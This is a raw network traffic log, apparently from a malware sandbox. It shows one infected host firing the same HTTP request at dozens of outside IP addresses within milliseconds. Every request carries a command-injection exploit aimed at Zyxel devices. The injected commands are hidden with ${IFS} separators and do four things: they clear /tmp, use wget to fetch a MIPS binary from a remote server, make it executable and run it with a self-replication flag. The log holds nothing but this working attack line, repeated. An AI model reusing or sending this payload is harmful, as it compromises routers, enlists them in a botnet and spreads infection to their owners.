                                                        Jan 28, 2024 10:12:58.515180111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5850192.168.2.1458178141.71.66.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515201092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5851192.168.2.1452198160.98.190.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515254974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5852192.168.2.145186081.251.57.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515294075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5853192.168.2.1438810179.71.89.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515348911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5854192.168.2.1447310100.15.56.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515373945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5855192.168.2.1453114200.112.47.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515420914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5856192.168.2.144417640.242.96.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515475988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5857192.168.2.1448684201.237.82.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515501976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5858192.168.2.144665845.21.182.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515530109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5859192.168.2.1450646152.222.204.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515573025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5860192.168.2.1442878109.194.156.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515621901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5861192.168.2.1448212118.55.225.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515649080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5862192.168.2.144051084.188.4.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515693903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5863192.168.2.144916898.240.215.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515722990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5864192.168.2.145452282.243.188.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515769005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5865192.168.2.145101436.60.156.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515804052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5866192.168.2.144496252.172.99.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515851974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5867192.168.2.1439470181.236.214.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515886068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5868192.168.2.145527283.98.199.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515932083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5869192.168.2.1441660153.83.237.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515957117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5870192.168.2.144048665.91.101.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515988111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5871192.168.2.1456804121.164.97.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516032934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5872192.168.2.1455134175.97.124.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516073942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5873192.168.2.1437396200.32.122.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516109943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5874192.168.2.14455704.73.23.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516144037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5875192.168.2.1460610179.39.203.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516177893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5876192.168.2.144381671.229.234.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516212940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5877192.168.2.1456848135.160.84.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516259909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5878192.168.2.145723071.174.187.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516299963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5879192.168.2.144652845.29.160.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516345978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5880192.168.2.144734814.182.202.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516391993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5881192.168.2.1450928197.180.33.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516438961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5882192.168.2.1456540204.59.147.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516467094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5883192.168.2.143282419.73.217.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516521931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5884192.168.2.145088247.181.163.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516572952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5885192.168.2.1433602139.55.131.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516609907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5886192.168.2.144094476.126.136.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516640902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5887192.168.2.145443642.174.67.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516671896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5888192.168.2.143700236.138.127.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516697884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5889192.168.2.144207662.106.196.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516737938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5890192.168.2.145050280.53.0.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516787052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5891192.168.2.1450340131.14.50.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516819954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5892192.168.2.1435572194.203.182.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516880989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5893192.168.2.1436746119.233.84.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516907930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5894192.168.2.145768413.150.158.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516949892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5895192.168.2.1436996187.82.104.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.516973972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5896192.168.2.1434126130.253.102.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517004967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5897192.168.2.1450282128.80.81.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517039061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5898192.168.2.1442830134.180.126.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517076969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5899192.168.2.14495425.137.165.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517113924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5900192.168.2.1448796121.27.5.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517168999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5901192.168.2.143502076.207.228.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517199993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5902192.168.2.143955650.192.152.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517227888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5903192.168.2.1448498177.53.231.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517258883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5904192.168.2.1434094171.37.125.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517317057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5905192.168.2.144703657.247.7.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517328024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5906192.168.2.144650843.203.137.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517360926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5907192.168.2.1459050158.115.19.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517400026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5908192.168.2.1433032193.242.114.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517448902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5909192.168.2.144237845.140.45.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517469883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5910192.168.2.1459564132.86.55.244443
                                                        TimestampBytes transferredDirectionData
